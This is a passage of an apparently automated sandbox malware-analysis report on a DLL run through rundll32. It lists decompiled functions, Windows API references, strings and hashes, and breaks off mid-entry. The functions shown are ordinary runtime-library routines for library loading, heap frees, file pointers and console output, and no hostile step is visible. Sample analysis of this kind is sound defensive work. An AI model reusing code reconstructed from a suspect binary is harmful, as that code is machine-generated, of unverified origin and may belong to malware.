					RedrawWindow(_a4, 0, 0, 0x105);
					E10001CFA(0x1004dc38);
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t23,  *0x1004dc38);
					 *0x1004dc34 = 1;
				}
				return 0;
			}

0x1000144d
0x10001476
0x10001482
0x1000148f
0x10001499
0x1000149f
0x100014a5
0x100014ac
0x100014b1
0x100014b1
0x100014bc

APIs

GetMenu.USER32 ref: 10001456
GetSubMenu.USER32 ref: 1000145F
GetMenuState.USER32(00000000,000000CB,00000000), ref: 1000146E
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 10001482

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

Strings

p<H, xrefs: 10001488, 100014A6

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateRedrawStateWindow
String ID: p<H
API String ID: 2380408669-2688811295
Opcode ID: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction ID: be1ad7771bc6ae16dbc7eccf9958df4cdf15cb777987d046380b36b05f21978e
Opcode Fuzzy Hash: 970e6ee6165374ff70056ff367cbba4755ef3d9930bf192b7c9da9b34f450319
Instruction Fuzzy Hash: D2F03C74601229BBEB11AF64CE8DECB3EA9EF06790F404055F905E6160DAB09941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10029E10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029E10(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0 || E10023828(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x10029e1f
0x10029e27
0x10029e72
0x10029e29
0x10029e32
0x00000000
0x10029e6f
0x10029e6e
0x10029e6e

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,10029DC9), ref: 10029E1F
GetLastError.KERNEL32(?,10029DC9), ref: 10029E29
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 10029E67

Strings

api-ms-, xrefs: 10029E36
ext-ms-, xrefs: 10029E4C

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction ID: baf72c8e3dffbcae0311709dc34ded704fcdaf485427fd651554a83b46c1da09
Opcode Fuzzy Hash: 03b412f2dcfeb729a237b2d803d91605f4d356a3e8cd5e5128e68d377a8432c2
Instruction Fuzzy Hash: 0DF03030640249B7EF109B61ED46B5A3F99EB506C0FA24430FE0CE84E5EBA2E9519599

Uniqueness

Uniqueness Score: -1.00%

Function 1001070E, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E1001070E(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1004223c(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x10010714
0x10010718
0x10010723
0x1001072b
0x10010736
0x1001073c
0x10010740
0x10010747
0x1001074d
0x1001074d
0x1001074f
0x10010754
0x00000000
0x10010759
0x10010760

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10010695,?,?,1001065D,00000000,7248FFF6,?), ref: 10010723
GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,10010695,?,?,1001065D,00000000,7248FFF6,?), ref: 10010736
FreeLibrary.KERNEL32(00000000,?,?,10010695,?,?,1001065D,00000000,7248FFF6,?), ref: 10010759

Strings

mscoree.dll, xrefs: 1001071C
CorExitProcess, xrefs: 1001072E

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction ID: afe5ac3e96f71655a5e367b3be99abbbceb1196fcb5638c15691c36776f791ea
Opcode Fuzzy Hash: 50b634fdbf317f93d03933747c97007d475fe10918e8b11ab9f1374748a6aaeb
Instruction Fuzzy Hash: 31F08230B01129FBDB01DB50CE49BDD7BA8DF00791F104060F941E10A0CB70DE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 100257D6, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 100258E5
_free.LIBCMT ref: 100258FC
_free.LIBCMT ref: 10025919
_free.LIBCMT ref: 10025934
_free.LIBCMT ref: 1002594B

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction ID: b32e4abf061af2b49d691e16b66c44ce7c89ffe3064c7ed98f8274118a3d5f98
Opcode Fuzzy Hash: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction Fuzzy Hash: 3251F471A00705EFDB11CF69EC41B6A73F4FF48765B914569E84AE7250EB32EA40CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1003939F, Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 100393B5
GetLastError.KERNEL32(?,?,?), ref: 100393BF
__dosmaperr.LIBCMT ref: 100393C6
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 100393E4
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 1003940A

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction ID: b407cb5834295830b04853e8380503d0af7682c42ed55c8a01c32ac15598fb64
Opcode Fuzzy Hash: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction Fuzzy Hash: C6015371901129FFDB12EFA1CC4899F3FBDEF017A1F518554F8249A1A0CB309A81DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002F136, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1002F14E

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F160
_free.LIBCMT ref: 1002F172
_free.LIBCMT ref: 1002F184
_free.LIBCMT ref: 1002F196

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction ID: 6117e9590aa72a6bc89c84abd52b3ea92389668d0d0b3033db3b93dc22f4f4dd
Opcode Fuzzy Hash: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction Fuzzy Hash: 70F09631508210D7E650EBA4FEC6C2673E9EA053D43E0492EF458D7600CB30FC808E94

Uniqueness

Uniqueness Score: -1.00%

Function 10010849, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 1001088C, 10010893, 100108C9
H,D, xrefs: 1001089A

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe$H,D
API String ID: 0-1047365567
Opcode ID: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction ID: 4195f098a662b01fce56375507ef603a022793ef94c33478d48d106903ee8a7f
Opcode Fuzzy Hash: 89d77395745d81d233aacb16cc1e66d02bdacb5c1c833554ea3477ca4157bf35
Instruction Fuzzy Hash: 7841B375B04254AFEB11DB99DD8199EBBF8EF85350F100066F884DB252EAB0DE80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100055B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 10005644

Strings

csm, xrefs: 100055CA
MOC, xrefs: 100055C2
RCC, xrefs: 100055BA

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction ID: ba491e0a52f827d7fd065b4ce93cba473ca224792a09d2010a1ea98d05584bc9
Opcode Fuzzy Hash: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction Fuzzy Hash: 24116075504204DFEB08DF64C841A9BB7F8EF052D7F51009AE8418B265E776FE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1003BC37, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000), ref: 1003BC8D
GetLastError.KERNEL32(?,1003BA56,?,1004B6E0,0000000C,1003BC17,?,?,?), ref: 1003BC97
__dosmaperr.LIBCMT ref: 1003BCC2

Strings

x|H, xrefs: 1003BC51

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: x|H
API String ID: 2583163307-1580081058
Opcode ID: 72f9e405a3e0aded8a94c5d7cbe51c4483ac60f3e4ebb85620b804f4ca66133f
Instruction ID: 5a95298400e09611cdde6b48d7188b83264b713d2b6cc128102f312a6002e825
Opcode Fuzzy Hash: 72f9e405a3e0aded8a94c5d7cbe51c4483ac60f3e4ebb85620b804f4ca66133f
Instruction Fuzzy Hash: DC012F32A155601ED227D3345D96B5E2789CBC377AF270159EE08DF1D2DE60AC818190

Uniqueness

Uniqueness Score: -1.00%

Function 1000D7D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,1000D78C), ref: 1000D7DE
GetLastError.KERNEL32(?,1000D78C), ref: 1000D7E8
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 1000D810

Strings

api-ms-, xrefs: 1000D7F5

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction ID: e74e9b093023e81d82c4867d880b496c8476b2db1d57206d9312647a4de92240
Opcode Fuzzy Hash: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction Fuzzy Hash: D4E04830380249B7FF006F60DD46B4D3B58EB11AC1F60C431FA0CE80F5DB61A85586A8

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2F3, Relevance: 6.3, APIs: 4, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 1002D37D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction ID: 60edc47403ceb57e4c32773f528f628eab84e72a7bd41eb7e043d998d246c257
Opcode Fuzzy Hash: 6e08ab9a1fa69a4118e9f31670c8a60bf4d3ea2fa92c3c91dc5dc3b4aa9ad292
Instruction Fuzzy Hash: 68B19B719006969FDB01EF28D881BEEBBF5EF45344F6140ABE844DB241D674AE01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10005B62, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 10005C29
___AdjustPointer.LIBCMT ref: 10005C4C
___AdjustPointer.LIBCMT ref: 10005CE8

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction ID: 31fa209adb8231de4210eaca4de771a1eb96de73e4b0f2c6b5dc5ef330e7e6b6
Opcode Fuzzy Hash: 0a6d94b4c3479a4b0be2b1027ae3d127e2d81f876ae5e55fb9d0f4828f490593
Instruction Fuzzy Hash: E351C075600706AFFB29CF10D881FAB77A4EF443D2F204529EC0596699EB32ED40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B1EA, Relevance: 6.2, APIs: 4, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

shared_ptr.LIBCMT ref: 1000B255
operator+.LIBVCRUNTIME ref: 1000B2A5
operator+.LIBVCRUNTIME ref: 1000B38C
shared_ptr.LIBCMT ref: 1000B3F7

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: operator+shared_ptr
String ID:
API String ID: 864562889-0
Opcode ID: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction ID: 93e7bdd40a4f091c83d39b0a35ead360230e477b65409987ed75284ff6752577
Opcode Fuzzy Hash: e6218108176b14940d3872b46b66bed8babf2f70d609e583f29d53091d4cb5cb
Instruction Fuzzy Hash: F8517D7180495AEFEB00CFA8C945AAE7BF4FB053C0F20856AE81997219D776DB41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1000A248, Relevance: 6.1, APIs: 4, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 1000A2D0

Part of subcall function 100073B4: __aulldvrm.LIBCMT ref: 100073E5

DName::operator+.LIBCMT ref: 1000A2DD
DName::operator=.LIBVCRUNTIME ref: 1000A35D
DName::DName.LIBVCRUNTIME ref: 1000A37D

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: NameName::$Name::operator+Name::operator=__aulldvrm
String ID:
API String ID: 2448499823-0
Opcode ID: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction ID: 4432753ead1cd1f4d13ab9af0bf177137c14a2538a54f020a321214d9f530d75
Opcode Fuzzy Hash: 90b53fb15ac9b4906040d35faff781823134f217f45143ff32974585a6f67a62
Instruction Fuzzy Hash: 1D519E74D04255DFEB05CF58CA80A9EBBF4FB46380F10829AF9159B259D7B0AF80CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100269CF, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 10027720: _free.LIBCMT ref: 1002772E

Part of subcall function 10028BDD: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,1002B316,10032FF6,0000FDE9,00000000,?,?,?,10032D5E,0000FDE9,00000000,?), ref: 10028C89

GetLastError.KERNEL32 ref: 10026A37
__dosmaperr.LIBCMT ref: 10026A3E
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10026A7D
__dosmaperr.LIBCMT ref: 10026A84

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction ID: bd05e1bc39f87d2aee2b562c84437264c3a7a5bb9226fc401e292b52289c8790
Opcode Fuzzy Hash: dafd7d44092715414cc22d533bd9d2ee6f711b83f96ec667994af98859a43765
Instruction Fuzzy Hash: BE21C575600216BFD710DFA5AC8195BB7ECFF093A47A2C529F919A7151DB30FC408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10023FB6, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,7248FFF6,?,1000F7D4,7248FFF6,?,00000000,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10023FBB
_free.LIBCMT ref: 10024018
_free.LIBCMT ref: 1002404E
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,1000E78E,10042340,7248FFF6,00000000,00000000), ref: 10024059

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c711fba6276f8f2c622c08fb98d9d54ba775c2d1375e7cc1467efb8d747940f6
Instruction ID: 23280f8c2260b11c3a06f993c25238af481de1058feaba7f8c12448f37a63b00
Opcode Fuzzy Hash: c711fba6276f8f2c622c08fb98d9d54ba775c2d1375e7cc1467efb8d747940f6
Instruction Fuzzy Hash: AE11E3367042052FE241E7647EC6E1B22A9DBC26B4BE30235FB24D32E2DD319C918524

Uniqueness

Uniqueness Score: -1.00%

Function 10023E5B, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 10023E5F
_free.LIBCMT ref: 10023EE0
SetLastError.KERNEL32(00000000), ref: 10023F01

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9ac55a0c10aff7cce1aad71d059a7cb87632d9d1a9fc257b055d860b840c7b7d
Instruction ID: e08d1e95c12827319e42ff99bf0cbd6eb4c5bc448b54ed9f77757ffd9b9b94e2
Opcode Fuzzy Hash: 9ac55a0c10aff7cce1aad71d059a7cb87632d9d1a9fc257b055d860b840c7b7d
Instruction Fuzzy Hash: DF1104357053226FEB10E7B4BEC6F1B3798DB022B8BE20235FD10D21E2DE546C4A9164

Uniqueness

Uniqueness Score: -1.00%

Function 1003B8D4, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 1003B8EE
GetLastError.KERNEL32 ref: 1003B8FA

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B90A

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003B91E

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction ID: 383a7036c8f4c86a359b566b59d293377cabd9f826cc08592a6f7cb210b54fdd
Opcode Fuzzy Hash: 685eef77ad1800851d9f857d5739ebb636a0bac401fd8fe300b65c4c84b708e6
Instruction Fuzzy Hash: E5F05E3A200516BFDB126B96CD48B467BF6EFCA261B11441AFB49C6530CA31A850DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1003B9BA, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 1003B9D1
GetLastError.KERNEL32(?,100395D6,?,00000001,?,00000001,?,10032A34,?,?,00000001,?,00000001,?,10032F91,1002B316), ref: 1003B9DD

Part of subcall function 1003B9A3: CloseHandle.KERNEL32(FFFFFFFE), ref: 1003B9B3

___initconout.LIBCMT ref: 1003B9ED

Part of subcall function 1003B965: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000), ref: 1003B978

WriteConsoleW.KERNEL32 ref: 1003BA02

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
